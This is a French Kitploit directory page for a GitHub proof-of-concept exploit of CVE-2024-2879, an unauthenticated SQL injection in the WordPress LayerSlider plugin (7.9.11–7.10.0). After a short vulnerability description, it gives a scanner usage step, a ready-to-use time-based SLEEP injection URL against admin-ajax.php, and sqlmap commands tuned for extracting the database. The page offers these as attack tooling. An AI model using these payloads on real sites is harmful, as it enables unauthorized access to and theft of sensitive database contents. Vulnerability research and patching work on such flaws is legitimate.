Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/herculeszxc/cve-2024-2879
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubherculeszxc/cve-2024-2879

CVE-2024-2879

Exploit de preuve de concept pour CVE-2024-2879 : injection SQL non authentifiée dans le plugin WordPress LayerSlider (7.9.11-7.10.0). Comprend un script de scanner et un guide d'exploitation SQLMap pour extraire les informations de la base de données.

Voir le dépôt
2231il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-2879

Description

LayerSlider 7.9.11 - 7.10.0 - Injection SQL non authentifiée

Le plugin LayerSlider pour WordPress est vulnérable à une injection SQL via l'action ls_get_popup_markup dans les versions 7.9.11 et 7.10.0 en raison d'un échappement insuffisant sur le paramètre fourni par l'utilisateur et d'un manque de préparation suffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes existantes, pouvant être utilisées pour extraire des informations sensibles de la base de données.

Utilisation du scanner

  1. Installer les dépendances : pip install -r requirements.txt
  2. python3 scan.py or <urllist.txt> image

Vérification manuelle si le site n'est pas protégé par un WAF

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq" Temps de réponse avec un délai de 5 secondes

image

Exploitation avec SQL Map

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T ou sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T

Télécharger l’outil